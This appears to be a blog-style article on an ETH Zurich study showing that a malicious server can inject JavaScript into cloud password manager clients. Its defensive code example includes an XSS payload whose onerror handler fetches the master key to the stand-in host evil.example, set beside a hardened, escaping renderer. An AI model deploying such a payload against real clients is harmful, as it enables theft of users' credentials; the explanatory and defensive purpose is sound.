A study from ETH Zurich reveals security flaws in cloud password managers such as Bitwarden, LastPass, and Dashlane. The researchers demonstrated that a compromised server can bypass the clients' protections and read or modify stored credentials. This contradicts the promise of zero-knowledge encryption, under which the provider never holds the key and so should never be able to see the vault contents.
The Weak Link: Client-Server Architecture and HTTP Protocol ⛓️
The researchers traced the problem not to the encryption itself but to how the client applications implement the protocol they speak with the server. Acting as a malicious server, they intercepted and manipulated HTTP responses during vault synchronization. That was enough to inject JavaScript into the client; once executed, the injected code extracts the master password or the already-decrypted vault, nullifying the protection end-to-end encryption is supposed to give. The lesson is that every field the server can alter has to be treated as hostile input by the client, even when the vault entries themselves are encrypted.
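To make the mechanism concrete, here is an added example (not code from the ETH Zurich paper or from any of the vendors named above) of how a server-controlled field in a sync response can turn into script execution inside a web client. The response shape, the field names, and the exfiltration target `evil.example` are assumptions for illustration; the point is the difference between a renderer that interpolates server data straight into markup and one that escapes it and validates identifiers.

```javascript
// Added example: a simulated sync response from a malicious server, rendered by
// a naive client and by a hardened client. Response shape and field names are
// assumed; this is not any real password manager's protocol.

// Constructed sync response. The second item's `name` carries an HTML payload
// with an inline event handler instead of a site name.
const maliciousSyncResponse = {
  items: [
    { id: "a1", name: "example.com", username: "alice" },
    {
      id: "a2",
      name: '<img src=x onerror="fetch(\'https://evil.example/?k=\'+window.masterKey)">',
      username: "bob",
    },
  ],
};

// Vulnerable renderer: whatever the server puts in `name` or `username`
// becomes markup as soon as the result is assigned to innerHTML.
function renderItemVulnerable(item) {
  return `<li data-id="${item.id}"><b>${item.name}</b> (${item.username})</li>`;
}

// Minimal HTML escaping for text placed in element content or quoted attributes.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;",
  })[c]);
}

// Hardened renderer: server-controlled text is escaped before it reaches markup,
// and the identifier is validated against a strict allowlist rather than escaped.
function renderItemHardened(item) {
  if (!/^[A-Za-z0-9_-]{1,64}$/.test(item.id)) {
    throw new Error("rejecting item with malformed id");
  }
  return `<li data-id="${item.id}"><b>${escapeHtml(item.name)}</b> (${escapeHtml(item.username)})</li>`;
}

// Crude check on the produced markup: any tag the renderer did not emit itself,
// or any on*= event-handler attribute inside a tag, counts as foreign markup.
const ALLOWED_TAGS = new Set(["li", "/li", "b", "/b"]);
function containsForeignMarkup(html) {
  for (const m of html.matchAll(/<([^>]*)>/g)) {
    const inner = m[1];
    const name = inner.match(/^\s*(\/?\w+)/);
    if (!name || !ALLOWED_TAGS.has(name[1].toLowerCase())) return true;
    if (/\son\w+\s*=/i.test(inner)) return true;
  }
  return false;
}

// Render every item of a sync response with the given renderer.
function renderSync(response, renderItem) {
  return response.items.map(renderItem).join("\n");
}

// Vulnerable output contains the injected <img onerror=...>; hardened does not.
console.log(containsForeignMarkup(renderSync(maliciousSyncResponse, renderItemVulnerable)));
console.log(containsForeignMarkup(renderSync(maliciousSyncResponse, renderItemHardened)));
```

Escaping is only the first layer. A real client would also ship a Content Security Policy that forbids inline handlers and script sources outside its own origin, and it would refuse to render any item whose ciphertext failed to authenticate under the user's key, so that a server which can rewrite responses still cannot choose what the client executes.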
Your Master Password Sends Greetings (and the Rest of the Keys) 👋
So you entrusted your digital secrets to a system that promised to be an impregnable fortress. It turns out the front door had a complex lock, but the side window was wide open. It's a reminder that in security, a chain is only as strong as its weakest, or in this case most creative, link. Now your bank key and your Netflix one are on an unexpected trip to a Swiss server.